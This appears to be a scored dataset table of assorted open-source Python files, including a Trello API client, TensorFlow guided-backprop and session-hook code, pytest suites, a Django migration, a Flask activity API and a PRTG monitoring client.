| max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content | score | int_score |
|---|---|---|---|---|---|---|
| string (length 3–269) | string (length 4–119) | int64 (0–191k) | string (length 1–7) | string (length 6–1.05M) | float64 (0.23–5.13) | int64 (0–5) |
trellominer/api/trello.py | xnoder/trellominer | 0 | 6900 | <reponame>xnoder/trellominer
import os
import requests
from trellominer.config import yaml
class HTTP(object):
def __init__(self):
self.config = yaml.read(os.getenv("TRELLO_CONFIG", default=os.path.join(os.path.expanduser('~'), ".trellominer.yaml")))
self.api_url = os.getenv("TRELLO_URL", default=self.config['api']['url'])
self.api_key = os.getenv("TRELLO_API_KEY", default=self.config['api']['key'])
self.api_token = os.getenv("TRELLO_API_TOKEN", default=self.config['api']['token'])
self.organization = os.getenv("TRELLO_ORGANIZATION", default=self.config['api']['organization'])
self.output_file = os.getenv("TRELLO_OUTPUT_FILE", default=self.config['api']['output_file_name'])
class Trello(HTTP):
def __init__(self):
super().__init__()
def boards(self):
url = "{0}/organizations/{1}/boards?key={2}&token={3}".format(
self.api_url, self.organization, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def cards(self, board_id):
url = "{0}/boards/{1}/cards?fields=shortLink,name,desc,idList,due,dueComplete,closed,idMembers&members=true&member_fields=fullName&key={2}&token={3}".format(
self.api_url, board_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def lists(self, list_id):
url = "{0}/lists/{1}?key={2}&token={3}".format(self.api_url, list_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def checklists(self, card_id):
url = "{0}/cards/{1}/checklists?key={2}&token={3}".format(
self.api_url, card_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
| 2.375 | 2 |
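A minimal usage sketch for the `Trello` client above, assuming a valid `~/.trellominer.yaml` (or the corresponding `TRELLO_*` environment variables) supplying the API URL, key, token and organization:

client = Trello()
for board in client.boards():                      # one dict per board, as returned by Trello's REST API
    print(board.get("name"), board.get("id"))
    for card in client.cards(board.get("id")):     # cards with the fields requested in the URL above
        print("  -", card.get("name"))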
alexnet_guided_bp_vanilla.py | wezteoh/face_perception_thru_backprop | 0 | 6901 | import numpy as np
import tensorflow as tf
import os
from scipy.io import savemat
from scipy.io import loadmat
from scipy.misc import imread
from scipy.misc import imsave
from alexnet_face_classifier import *
import matplotlib.pyplot as plt
plt.switch_backend('agg')
class backprop_graph:
def __init__(self, num_classes, nhid, cnn):
self.num_classes = num_classes
self.inputs = tf.placeholder(tf.float32, shape = [None, 227, 227, 3], name='input')
self.labels_1hot = tf.placeholder(tf.float32, shape=[None, self.num_classes])
self.cnn = cnn(self.inputs, None, self.num_classes)
self.cnn.preprocess()
self.cnn.convlayers()
self.cnn.fc_layers(transfer_learning=False, nhid=nhid)
def classifier_graph(self, temp=3.0):
self.probabilities = tf.nn.softmax(self.cnn.fc2/temp)
self.probability = tf.tensordot(self.probabilities, self.labels_1hot, axes=[[1],[1]])
self.log_probability = tf.log(self.probability)
def guided_backprop_graph(self):
self.grad_fc2 = tf.nn.relu(tf.gradients(self.probability, self.cnn.fc2)[0])
self.grad_fc1 = tf.nn.relu(tf.gradients(self.cnn.fc2, self.cnn.fc1, grad_ys=self.grad_fc2)[0])
self.grad_conv5 = tf.nn.relu(tf.gradients(self.cnn.fc1, self.cnn.conv5, grad_ys=self.grad_fc1)[0])
self.grad_conv4 = tf.nn.relu(tf.gradients(self.cnn.conv5, self.cnn.conv4, grad_ys=self.grad_conv5)[0])
self.grad_conv3 = tf.nn.relu(tf.gradients(self.cnn.conv4, self.cnn.conv3, grad_ys=self.grad_conv4)[0])
self.grad_conv2 = tf.nn.relu(tf.gradients(self.cnn.conv3, self.cnn.conv2, grad_ys=self.grad_conv3)[0])
self.grad_conv1 = tf.nn.relu(tf.gradients(self.cnn.conv2, self.cnn.conv1, grad_ys=self.grad_conv2)[0])
self.grad_image = tf.nn.relu(tf.gradients(self.cnn.conv1, self.inputs, grad_ys=self.grad_conv1)[0])
###
def guided_backprop(graph, image, one_hot, sess):
image = np.expand_dims(image, 0)
one_hot = np.expand_dims(one_hot, 0)
saliency_map = sess.run(graph.grad_image, feed_dict={graph.inputs:image, graph.labels_1hot:one_hot})[0]
scaling_adjustment = 1E-20
saliency_map_scaled = saliency_map/(np.max(saliency_map)+scaling_adjustment)
return saliency_map_scaled
| 2.421875 | 2 |
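A sketch of how the graph above might be driven, assuming `AlexNetFaceClassifier` stands in for the network class exported by `alexnet_face_classifier` (the wildcard import hides its real name) and that `image` is a preprocessed 227x227x3 array:

graph = backprop_graph(num_classes=10, nhid=512, cnn=AlexNetFaceClassifier)
graph.classifier_graph()
graph.guided_backprop_graph()
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())    # in practice, restore trained weights instead
    one_hot = np.eye(10)[3]                        # saliency with respect to class 3
    saliency = guided_backprop(graph, image, one_hot, sess)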
tests/test_sqlalchemy_registry.py | AferriDaniel/coaster | 48 | 6902 | <filename>tests/test_sqlalchemy_registry.py
"""Registry and RegistryMixin tests."""
from types import SimpleNamespace
import pytest
from coaster.db import db
from coaster.sqlalchemy import BaseMixin
from coaster.sqlalchemy.registry import Registry
# --- Fixtures -------------------------------------------------------------------------
@pytest.fixture()
def CallableRegistry(): # noqa: N802
"""Callable registry with a positional parameter."""
class CallableRegistry:
registry = Registry()
return CallableRegistry
@pytest.fixture()
def PropertyRegistry(): # noqa: N802
"""Registry with property and a positional parameter."""
class PropertyRegistry:
registry = Registry(property=True)
return PropertyRegistry
@pytest.fixture()
def CachedPropertyRegistry(): # noqa: N802
"""Registry with cached property and a positional parameter."""
class CachedPropertyRegistry:
registry = Registry(cached_property=True)
return CachedPropertyRegistry
@pytest.fixture()
def CallableParamRegistry(): # noqa: N802
"""Callable registry with a keyword parameter."""
class CallableParamRegistry:
registry = Registry('kwparam')
return CallableParamRegistry
@pytest.fixture()
def PropertyParamRegistry(): # noqa: N802
"""Registry with property and a keyword parameter."""
class PropertyParamRegistry:
registry = Registry('kwparam', property=True)
return PropertyParamRegistry
@pytest.fixture()
def CachedPropertyParamRegistry(): # noqa: N802
"""Registry with cached property and a keyword parameter."""
class CachedPropertyParamRegistry:
registry = Registry('kwparam', cached_property=True)
return CachedPropertyParamRegistry
@pytest.fixture()
def all_registry_hosts(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""All test registries as a list."""
return [
CallableRegistry,
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
]
@pytest.fixture(scope='module')
def registry_member():
"""Test registry member function."""
def member(pos=None, kwparam=None):
pass
return member
@pytest.fixture(scope='session')
def registrymixin_models():
"""Fixtures for RegistryMixin tests."""
# We have two sample models and two registered items to test that
# the registry is unique to each model and is not a global registry
# in the base RegistryMixin class.
# Sample model 1
class RegistryTest1(BaseMixin, db.Model):
"""Registry test model 1."""
__tablename__ = 'registry_test1'
# Sample model 2
class RegistryTest2(BaseMixin, db.Model):
"""Registry test model 2."""
__tablename__ = 'registry_test2'
# Sample registered item (form or view) 1
class RegisteredItem1:
"""Registered item 1."""
def __init__(self, obj=None):
"""Init class."""
self.obj = obj
# Sample registered item 2
@RegistryTest2.views('test')
class RegisteredItem2:
"""Registered item 2."""
def __init__(self, obj=None):
"""Init class."""
self.obj = obj
# Sample registered item 3
@RegistryTest1.features('is1')
@RegistryTest2.features()
def is1(obj):
"""Assert object is instance of RegistryTest1."""
return isinstance(obj, RegistryTest1)
RegistryTest1.views.test = RegisteredItem1
return SimpleNamespace(**locals())
# --- Tests ----------------------------------------------------------------------------
# --- Creating a registry
def test_registry_set_name():
"""Registry's __set_name__ gets called."""
# Registry has no name unless added to a class
assert Registry()._name is None
class RegistryUser:
reg1 = Registry()
reg2 = Registry()
assert RegistryUser.reg1._name == 'reg1'
assert RegistryUser.reg2._name == 'reg2'
def test_registry_reuse_error():
"""Registries cannot be reused under different names."""
# Registry raises TypeError from __set_name__, but Python recasts as RuntimeError
with pytest.raises(RuntimeError):
class RegistryUser:
a = b = Registry()
def test_registry_reuse_okay():
"""Registries be reused with the same name under different hosts."""
reusable = Registry()
assert reusable._name is None
class HostA:
registry = reusable
assert HostA.registry._name == 'registry'
class HostB:
registry = reusable
assert HostB.registry._name == 'registry'
assert HostA.registry is HostB.registry
assert HostA.registry is reusable
def test_registry_param_type():
"""Registry's param must be string or None."""
r = Registry()
assert r._param is None
r = Registry('')
assert r._param is None
r = Registry(1)
assert r._param == '1'
r = Registry('obj')
assert r._param == 'obj'
r = Registry(param='foo')
assert r._param == 'foo'
def test_registry_property_cached_property():
"""A registry can have property or cached_property set, but not both."""
r = Registry()
assert r._default_property is False
assert r._default_cached_property is False
r = Registry(property=True)
assert r._default_property is True
assert r._default_cached_property is False
r = Registry(cached_property=True)
assert r._default_property is False
assert r._default_cached_property is True
with pytest.raises(TypeError):
Registry(property=True, cached_property=True)
# --- Populating a registry
def test_add_to_registry(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added to registries and accessed as per registry settings."""
@CallableRegistry.registry()
@PropertyRegistry.registry()
@CachedPropertyRegistry.registry()
@CallableParamRegistry.registry()
@PropertyParamRegistry.registry()
@CachedPropertyParamRegistry.registry()
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member(1) == (callable_host, 1)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member(1) == (1, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_property_cache_mismatch(
PropertyRegistry, CachedPropertyRegistry # noqa: N803
):
"""A registry's default setting must be explicitly turned off if conflicting."""
with pytest.raises(TypeError):
@PropertyRegistry.registry(cached_property=True)
def member1(pos=None, kwparam=None):
return (pos, kwparam)
with pytest.raises(TypeError):
@CachedPropertyRegistry.registry(property=True)
def member2(pos=None, kwparam=None):
return (pos, kwparam)
@PropertyRegistry.registry(cached_property=True, property=False)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
def test_add_to_registry_host(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a function, overriding default settings."""
@CallableRegistry.registry()
@PropertyRegistry.registry(property=False)
@CachedPropertyRegistry.registry(cached_property=False)
@CallableParamRegistry.registry()
@PropertyParamRegistry.registry(property=False)
@CachedPropertyParamRegistry.registry(cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member(1) == (callable_host, 1)
assert property_host.registry.member(2) == (property_host, 2)
assert cached_property_host.registry.member(3) == (cached_property_host, 3)
assert callable_param_host.registry.member(4) == (4, callable_param_host)
assert property_param_host.registry.member(5) == (5, property_param_host)
assert cached_property_param_host.registry.member(6) == (
6,
cached_property_param_host,
)
def test_add_to_registry_property(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a property, overriding default settings."""
@CallableRegistry.registry(property=True)
@PropertyRegistry.registry(property=True)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
@CallableParamRegistry.registry(property=True)
@PropertyParamRegistry.registry(property=True)
@CachedPropertyParamRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member == (callable_host, None)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member == (None, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_add_to_registry_cached_property(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a property, overriding default settings."""
@CallableRegistry.registry(property=True)
@PropertyRegistry.registry(property=True)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
@CallableParamRegistry.registry(property=True)
@PropertyParamRegistry.registry(property=True)
@CachedPropertyParamRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member == (callable_host, None)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member == (None, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_add_to_registry_custom_name(all_registry_hosts, registry_member):
"""Members can be added to a registry with a custom name."""
assert registry_member.__name__ == 'member'
for host in all_registry_hosts:
# Mock decorator call
host.registry('custom')(registry_member)
# This adds the member under the custom name
assert host.registry.custom is registry_member
# The default name of the function is not present...
with pytest.raises(AttributeError):
assert host.registry.member is registry_member
# ... but can be added
host.registry()(registry_member)
assert host.registry.member is registry_member
def test_add_to_registry_underscore(all_registry_hosts, registry_member):
"""Registry member names cannot start with an underscore."""
for host in all_registry_hosts:
with pytest.raises(ValueError):
host.registry('_new_member')(registry_member)
def test_add_to_registry_dupe(all_registry_hosts, registry_member):
"""Registry member names cannot be duplicates of an existing name."""
for host in all_registry_hosts:
host.registry()(registry_member)
with pytest.raises(ValueError):
host.registry()(registry_member)
host.registry('custom')(registry_member)
with pytest.raises(ValueError):
host.registry('custom')(registry_member)
def test_cached_properties_are_cached(
PropertyRegistry, # noqa: N803
CachedPropertyRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""Cached properties are truly cached."""
# Register registry member
@PropertyRegistry.registry()
@CachedPropertyRegistry.registry()
@PropertyParamRegistry.registry()
@CachedPropertyParamRegistry.registry()
def member(pos=None, kwparam=None):
return [pos, kwparam] # Lists are different each call
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
# The properties and cached properties work
assert property_host.registry.member == [property_host, None]
assert cached_property_host.registry.member == [cached_property_host, None]
assert property_param_host.registry.member == [None, property_param_host]
assert cached_property_param_host.registry.member == [
None,
cached_property_param_host,
]
# The properties and cached properties return equal values on each access
assert property_host.registry.member == property_host.registry.member
assert cached_property_host.registry.member == cached_property_host.registry.member
assert property_param_host.registry.member == property_param_host.registry.member
assert (
cached_property_param_host.registry.member
== cached_property_param_host.registry.member
)
# Only the cached properties return the same value every time
assert property_host.registry.member is not property_host.registry.member
assert cached_property_host.registry.member is cached_property_host.registry.member
assert (
property_param_host.registry.member is not property_param_host.registry.member
)
assert (
cached_property_param_host.registry.member
is cached_property_param_host.registry.member
)
# TODO:
# test_registry_member_cannot_be_called_clear_cache
# test_multiple_positional_and_keyword_arguments
# test_registry_iter
# test_registry_members_must_be_callable
# test_add_by_directly_sticking_in
# test_instance_registry_is_cached
# test_clear_cache_for
# test_clear_cache
# test_registry_mixin_config
# test_registry_mixin_subclasses
# --- RegistryMixin tests --------------------------------------------------------------
def test_access_item_from_class(registrymixin_models):
"""Registered items are available from the model class."""
assert (
registrymixin_models.RegistryTest1.views.test
is registrymixin_models.RegisteredItem1
)
assert (
registrymixin_models.RegistryTest2.views.test
is registrymixin_models.RegisteredItem2
)
assert (
registrymixin_models.RegistryTest1.views.test
is not registrymixin_models.RegisteredItem2
)
assert (
registrymixin_models.RegistryTest2.views.test
is not registrymixin_models.RegisteredItem1
)
assert registrymixin_models.RegistryTest1.features.is1 is registrymixin_models.is1
assert registrymixin_models.RegistryTest2.features.is1 is registrymixin_models.is1
def test_access_item_class_from_instance(registrymixin_models):
"""Registered items are available from the model instance."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
# When accessed from the instance, we get a partial that resembles
# the wrapped item, but is not the item itself.
assert r1.views.test is not registrymixin_models.RegisteredItem1
assert r1.views.test.func is registrymixin_models.RegisteredItem1
assert r2.views.test is not registrymixin_models.RegisteredItem2
assert r2.views.test.func is registrymixin_models.RegisteredItem2
assert r1.features.is1 is not registrymixin_models.is1
assert r1.features.is1.func is registrymixin_models.is1
assert r2.features.is1 is not registrymixin_models.is1
assert r2.features.is1.func is registrymixin_models.is1
def test_access_item_instance_from_instance(registrymixin_models):
"""Registered items can be instantiated from the model instance."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
i1 = r1.views.test()
i2 = r2.views.test()
assert isinstance(i1, registrymixin_models.RegisteredItem1)
assert isinstance(i2, registrymixin_models.RegisteredItem2)
assert not isinstance(i1, registrymixin_models.RegisteredItem2)
assert not isinstance(i2, registrymixin_models.RegisteredItem1)
assert i1.obj is r1
assert i2.obj is r2
assert i1.obj is not r2
assert i2.obj is not r1
def test_features(registrymixin_models):
"""The features registry can be used for feature tests."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
assert r1.features.is1() is True
assert r2.features.is1() is False
| 2.359375 | 2 |
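A condensed sketch of the pattern those tests exercise, using the same `Registry` API; the `Document` host and `preview` member are illustrative names only:

class Document:
    views = Registry()                 # the descriptor picks up its name via __set_name__

@Document.views('preview')             # register a callable under a custom name
def preview_view(obj):
    return 'preview of {!r}'.format(obj)

doc = Document()
Document.views.preview(doc)            # class access returns the raw member
doc.views.preview()                    # instance access returns a partial with doc bound as first argument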
home/migrations/0010_auto_20180206_1625.py | RomanMahar/personalsite | 0 | 6903 | <reponame>RomanMahar/personalsite
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-02-06 16:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0028_merge'),
('home', '0009_remove_homepagesection_sectiontitle'),
]
operations = [
migrations.CreateModel(
name='SnippetClass',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(max_length=255)),
('page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='snippy', to='wagtailcore.Page')),
],
),
migrations.AlterField(
model_name='homepagesection',
name='sectionClassName',
field=models.SlugField(default='homepage-section', help_text='no spaces', max_length=100),
),
migrations.AddField(
model_name='homepagesection',
name='advert',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='home.SnippetClass'),
),
]
| 1.6875 | 2 |
nesta/packages/misc_utils/tests/test_guess_sql_type.py | anniyanvr/nesta | 13 | 6904 | import pytest
from nesta.packages.misc_utils.guess_sql_type import guess_sql_type
@pytest.fixture
def int_data():
return [1,2,4,False]
@pytest.fixture
def text_data():
return ['a', True, 2,
('A very long sentence A very long sentence A '
'very long sentence A very long sentence'), 'd']
@pytest.fixture
def float_data():
return [1,2.3,True,None]
@pytest.fixture
def bool_data():
return [True,False,None]
def test_guess_sql_type_int(int_data):
assert guess_sql_type(int_data) == 'INTEGER'
def test_guess_sql_type_float(float_data):
assert guess_sql_type(float_data) == 'FLOAT'
def test_guess_sql_type_bool(bool_data):
assert guess_sql_type(bool_data) == 'BOOLEAN'
def test_guess_sql_type_str(text_data):
assert guess_sql_type(text_data, text_len=10) == 'TEXT'
assert guess_sql_type(text_data, text_len=100).startswith('VARCHAR(')
| 2.4375 | 2 |
api/controller/activity.py | DXCChina/pms | 27 | 6905 | # -*- coding: utf-8 -*-
'''Activity management API endpoints.'''
from flask import request
from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User
from model.role import identity
from flask_jwt_extended import (fresh_jwt_required)
def demand_activity_add(activity_id, data):
'''Attach demands to an activity.'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if not demand.activityId:
demand.activityId = activity_id
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
def demand_activity_del(activity_id, data):
'''Detach demands from an activity.'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if demand.activityId == activity_id:
demand.activityId = None
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
def demand_activity_done(activity_id, data):
'''Mark activity demands as done.'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if demand.activityId == activity_id:
demand.status = 1
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
@fresh_jwt_required
@identity.check_permission("create", 'task')
def activity_add():
'''Create a project activity.'''
data = request.json
if 'memberId' in data and data['memberId']:
data['status'] = 'dev-ing'
with database.atomic():
activity_id = ActivityBase.create(**data).id
if 'memberId' in data and data['memberId']:
for member_id in data['memberId']:
role = ProjectMember.get(
ProjectMember.projectId == data['projectId'],
ProjectMember.memberId == member_id).role
ActivityMember.create(**{
'activityId': activity_id,
'memberId': member_id,
'role': role
})
demand_activity_add(activity_id, data['demand'])
return {"msg": 'ok'}
@fresh_jwt_required
@identity.check_permission("update", 'task')
def activity_update():
'''Update a project activity.'''
data = request.json
activity_id = data.pop('activityId')
with database.atomic():
if 'del_memberId' in data:
for member_id in data.pop('del_memberId'):
ActivityMember.delete().where(
(ActivityMember.activityId == activity_id) &
(ActivityMember.memberId == member_id)).execute()
if 'memberId' in data:
if not 'status' in data or not data['status']:
data['status'] = 'dev-ing'
for member_id in data.pop('memberId'):
ActivityMember.get_or_create(
activityId=activity_id,
memberId=member_id,
role=ProjectMember.get(
(ProjectMember.projectId == data['projectId'])
& (ProjectMember.memberId == member_id)).role)
if 'done_demand' in data:
demand_activity_done(activity_id, data.pop('done_demand'))
if 'demand' in data:
demand_activity_add(activity_id, data.pop('demand'))
if 'del_demand' in data:
demand_activity_del(activity_id, data.pop('del_demand'))
Activity.update(**data).where(Activity.id == activity_id).execute()
return {"msg": 'ok'}
@fresh_jwt_required
def activity_detail(activity_id):
'''Query activity details.
GET /api/activity/<int:activity_id>
'''
activity = Activity.findOne(Activity.id == activity_id)
activity['member'] = list(
ActivityMember.find(ActivityMember.role, User.username,
User.email, User.id).join(User)
.where(ActivityMember.activityId == activity_id))
activity['demand'] = list(
Demand.find().where(Demand.activityId == activity_id))
return activity
@fresh_jwt_required
def project_user(project_id):
'''Query project members.'''
return {
"data":
list(
ProjectMember.find(
ProjectMember.role,
User).join(User).where(ProjectMember.projectId == project_id))
}
| 2.4375 | 2 |
math/9. Palindrome number.py | Rage-ops/Leetcode-Solutions | 1 | 6906 | <filename>math/9. Palindrome number.py<gh_stars>1-10
# Easy
# https://leetcode.com/problems/palindrome-number/
# Time Complexity: O(log(x) to base 10)
# Space Complexity: O(1)
class Solution:
def isPalindrome(self, x: int) -> bool:
temp = x
rev = 0
while temp > 0:
rev = rev * 10 + temp % 10
temp //= 10
return rev == x
| 3.65625 | 4 |
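A quick trace of the digit-reversal loop for x = 121, plus the negative-number case:

# temp = 121, rev = 0
# pass 1: rev = 0*10 + 1 = 1,    temp = 12
# pass 2: rev = 1*10 + 2 = 12,   temp = 1
# pass 3: rev = 12*10 + 1 = 121, temp = 0
# Negative inputs never enter the loop, so rev stays 0 and rev == x is False.
assert Solution().isPalindrome(121) is True
assert Solution().isPalindrome(-121) is False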
panoramisk/__init__.py | Eyepea/panoramisk | 0 | 6907 | from .manager import Manager # NOQA
from .call_manager import CallManager # NOQA
from . import fast_agi # NOQA
| 1.085938 | 1 |
prtg/client.py | kevinschoon/prtg-py | 0 | 6908 | <filename>prtg/client.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
Python library for Paessler's PRTG (http://www.paessler.com/)
"""
import logging
import xml.etree.ElementTree as Et
from urllib import request
from prtg.cache import Cache
from prtg.models import Sensor, Device, Status, PrtgObject
from prtg.exceptions import BadTarget, UnknownResponse
class Connection(object):
"""
PRTG Connection Object
"""
def __init__(self):
self.response = list()
@staticmethod
def _encode_response(response, tag):
out = list()
if any([tag == 'devices', tag == 'sensors']):
for item in response.findall('item'):
i = dict()
for attrib in item:
i[attrib.tag] = attrib.text
if tag == 'devices':
out.append(Device(**i))
if tag == 'sensors':
out.append(Sensor(**i))
if tag == 'status':
i = dict()
for item in response:
i[item.tag] = item.text
out.append(Status(**i))
if tag == 'prtg':
i = dict()
for item in response:
i[item.tag] = item.text
out.append(PrtgObject(**i))
return out
def _process_response(self, response, expect_return=True):
"""
Process the response from the server.
"""
if expect_return:
try:
resp = Et.fromstring(response.read().decode('utf-8'))
except Et.ParseError as e:
raise UnknownResponse(e)
try:
ended = resp.attrib['listend'] # Catch KeyError and return finished
except KeyError:
ended = 1
return self._encode_response(resp, resp.tag), ended
def _build_request(self, query):
"""
Build the HTTP request.
"""
req, method = str(query), query.method
logging.debug('REQUEST: target={} method={}'.format(req, method))
return request.Request(url=req, method=method)
def get_request(self, query):
"""
Make a single HTTP request
"""
req = self._build_request(query)
logging.info('Making request: {}'.format(query))
resp, ended = self._process_response(request.urlopen(req))
self.response += resp
if not int(ended): # Recursively request until PRTG indicates "listend"
query.increment()
self.get_request(query)
class Client(object):
def __init__(self, endpoint, username, password):
self.endpoint = endpoint
self.username = username
self.password = password
self.cache = Cache()
@staticmethod
def query(query):
conn = Connection()
conn.get_request(query)
return conn.response
"""
def refresh(self, query):
logging.info('Refreshing content: {}'.format(content))
devices = Query(target='table', endpoint=self.endpoint, username=self.username, password=<PASSWORD>, content=content, counter=content)
self.connection.get_paginated_request(devices)
self.cache.write_content(devices.response)
def update(self, content, attribute, value, replace=False):
for index, obj in enumerate(content):
logging.debug('Updating object: {} with {}={}'.format(obj, attribute, value))
if attribute == 'tags':
tags = value.split(',')
if replace:
obj.tags = value.split(',')
else:
obj.tags += [x for x in tags if x not in obj.tags]
content[index] = obj
self.cache.write_content(content, force=True)
def content(self, content_name, parents=False, regex=None, attribute=None):
response = list()
for resp in self.cache.get_content(content_name):
if not all([regex, attribute]):
response.append(resp)
else:
if RegexMatch(resp, expression=regex, attribute=attribute):
response.append(resp)
if all([content_name == 'sensors', parents is True]):
logging.info('Searching for parents.. this may take a while')
p = list()
ids = set()
for index, child in enumerate(response):
parent = self.cache.get_object(str(child.parentid)) # Parent device.
if parent:
ids.add(str(parent.objid)) # Lookup unique parent ids.
else:
logging.warning('Unable to find sensor parent')
for parent in ids:
p.append(self.cache.get_object(parent))
response = p
return response
"""
| 2.671875 | 3 |
template/misc.py | da-h/tf-boilerplate | 0 | 6909 | import tensorflow as tf
from tensorflow.python.training.session_run_hook import SessionRunArgs
# Define data loaders #####################################
# See https://gist.github.com/peterroelants/9956ec93a07ca4e9ba5bc415b014bcca
class IteratorInitializerHook(tf.train.SessionRunHook):
"""Hook to initialise data iterator after Session is created."""
def __init__(self, func=None):
super(IteratorInitializerHook, self).__init__()
self.iterator_initializer_func = func
def after_create_session(self, session, coord):
"""Initialise the iterator after the session has been created."""
self.iterator_initializer_func(session)
# redefine summarysaverhook (for more accurate saving)
class CustomSummarySaverHook(tf.train.SummarySaverHook):
"""Saves summaries every N steps."""
def __init__(self,save_steps,*args,**kwargs):
super(CustomSummarySaverHook, self).__init__(*args,save_steps=save_steps,**kwargs)
def begin(self):
super().begin()
self._timer.reset()
self._iter_count = 0
def before_run(self, run_context): # pylint: disable=unused-argument
self._request_summary = ((self._iter_count + 1) % self.save_steps == 0)
requests = {"global_step": self._global_step_tensor}
if self._request_summary:
if self._get_summary_op() is not None:
# print(self._iter_count)
requests["summary"] = self._get_summary_op()
return SessionRunArgs(requests)
def after_run(self, run_context, run_values):
super().after_run(run_context,run_values)
self._iter_count += 1
class OneTimeSummarySaverHook(tf.train.SummarySaverHook):
"""One-Time SummarySaver
Saves summaries every N steps.
E.g. can be used for saving the source code as text.
"""
def __init__(self, output_dir=None, summary_writer=None, scaffold=None, summary_op=None):
self._summary_op = summary_op
self._summary_writer = summary_writer
self._output_dir = output_dir
self._scaffold = scaffold
class emptytimer():
def update_last_triggered_step(*args,**kwargs):
pass
self._timer = emptytimer()
def begin(self):
super().begin()
self._done = False
def before_run(self, run_context): # pylint: disable=unused-argument
self._request_summary = not self._done
requests = {"global_step": self._global_step_tensor}
if self._request_summary:
if self._get_summary_op() is not None:
# print(self._iter_count)
requests["summary"] = self._get_summary_op()
return SessionRunArgs(requests)
def after_run(self, run_context, run_values):
super().after_run(run_context,run_values)
self._done = True
def ExperimentTemplate() -> str:
"""A template with Markdown syntax.
:return: str with Markdown template
"""
return """
Experiment
==========
Any [markdown code](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet) can be used to describe this experiment.
For instance, you can find the automatically generated used settings of this run below.
Current Settings
----------------
| Argument | Value |
| -------- | ----- |
"""
| 2.71875 | 3 |
